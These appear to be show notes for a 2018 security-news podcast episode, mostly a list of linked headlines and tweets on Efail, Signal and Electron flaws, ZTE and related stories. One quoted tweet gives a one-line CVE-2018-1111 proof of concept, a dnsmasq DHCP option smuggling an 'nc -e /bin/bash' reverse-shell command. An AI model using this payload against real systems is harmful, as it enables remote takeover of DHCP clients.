Risky Business #499 -- Is PGP actually busted and Signal pwnt? Noooope

Presented by

Patrick Gray

CEO and Publisher

Adam Boileau

Technology Editor

In this week’s show we’re just going to drill into the week’s extra-long security news section with Adam Boileau, then go straight to the sponsor interview. I’ve got a fantastic feature interview for you this week, but I’m going to publish it outside of the news show. It was either that, or run stupidly long, or cut too much from everything to make it all fit.

This week’s sponsor interview is a good one though. We’re chatting with the team behind DarkTrace. They make a machine learning-backed network monitor. A key difference with this kit is that it actually gets involved on the network: if it sees something it’s confident is attacker behaviour, it will start spraying TCP resets to boot them off the network.

This is something the IPS systems of old used to do, but it’s an approach that fell out of favour. We’ll find out why that approach was discarded and why it’s coming back, as well as generally discuss the role of machine learning in security with a company that has invested in it heavily. This isn’t a “for or against” interview segment. This is a discussion with one company that is getting value out of the approach, so stick around for that.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.


Show notes

Without Nuclear Deal, U.S. Expects Resurgence in Iranian Cyberattacks - The New York Times

How Two Persian Gulf Nations Turned The US Media Into Their Battleground

National Security Council delays publication of cyber strategy over inclusion of 'offensive' measures

Bolton eliminates White House Cybersecurity Coordinator position

Lawmakers introduce bill to save top White House cyber job after Bolton eliminated it

Ex-CIA employee identified as suspect in 'Vault 7' leaks

Sebastian Schinzel on Twitter: "We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4"

'Efail' exploit can decrypt old emails that were previously encrypted - CyberScoop

Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated] | Ars Technica

CVE-2018-1000136 - Electron nodeIntegration Bypass

Security flaw in Electron impacts hundreds of desktop apps

Michael Gianarakis on Twitter: "I don’t know man - as I said I wasn’t involved so I don’t know what was tested and when, what was covered during disclosure etc. All I was saying in my original tweet was that I didn’t read the post to say any specific app was vulnerable or not.… https://t.co/wVmG4FE0yI"

Alfredo Ortega on Twitter: "Remote zero-click JavaScript code execution on signal desktop message app. Thanks @HacKanCuBa and @julianor https://t.co/YgT8akGfBI"

Alfredo Ortega on Twitter: "And we'll release the Signal-Desktop Remote code exec advisory (CVE-2018-10994) in some hours. Not a good week for privacy software. https://t.co/ElysIPAlvo"

It only took five hours to close a critical vulnerability in Signal's desktop client

'Disappearing' Signal Messages Are Stored Indefinitely on Mac Hard Drives - Motherboard

China's ZTE says main operations have ceased after US ban

Lucas Tomlinson on Twitter: "JUST IN: Pentagon orders all stores on U.S. military bases worldwide to ban phones and telecom equipment from Chinese companies Huawei and ZTE, following warnings from top U.S. intelligence officials the Chinese companies could be spying on Americans"

Donald J. Trump on Twitter: "President Xi of China, and I, are working together to give massive Chinese phone company, ZTE, a way to get back into business, fast. Too many jobs in China lost. Commerce Department has been instructed to get it done!"

Microsoft Enabling Javascript in Excel Has Security Pros Anxious | WIRED

Researcher Runs Coinhive Cryptominer in Excel Just Days After Microsoft Announces JavaScript Custom Functions

Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets

Georgia governor vetoes cyber bill that would criminalize “unauthorized access” | Ars Technica

Russian Troll Farm Hijacked American Teen Girls’ Computers for Likes

Dutch ditch Kaspersky on fears of Russian government influence

Possible Kaspersky sanctions meet resistance inside U.S. government

Wyden calls for FCC investigation into cell-phone tracking used by law enforcement

Kia‏☆ on Twitter: "this isnt a joke, try out https://t.co/QKa5nNOKjN, you can find the current location of a phone (not just with cell tower info, it can force AGPS) with just *its phone number*; the demo site requires you reply to an SMS but there's no technical requirement against that! https://t.co/kfMDU2qxjZ"

Government would be barred from mandating crypto backdoors under House bill

Symantec's stock plummets after announcement of internal audit

Lawmakers call for action following revelations that APT28 posed as ISIS online

Counterrorism Officials Concerned About Technological Advances of Jihadists in the US

Vigilante Hacks Government-Linked Cyberespionage Group - Motherboard

Pakistani military leverages Facebook Messenger for wide-ranging spyware campaign

DDoS Attacks Leverage UPnP Protocol to Avoid Mitigation

Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers

Windows 10 OpenSSH Client Installed by Default in April 2018 Update

Malicious Apps Get Back on the Play Store Just by Changing Their Name

Multiple OS Vendors Release Security Patches After Misinterpreting Intel Docs

Barkın Kılıç on Twitter: "#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat… https://t.co/NMthW41Xql"

Morning mail: Ecuador's costly Assange spy operation | Australia news | The Guardian

Evil Mainframe Penetration Testing Classes

Evil Mainframe: Mainframe Penetration Testing Registration, Tue, Jun 12, 2018 at 9:00 AM | Eventbrite

Darktrace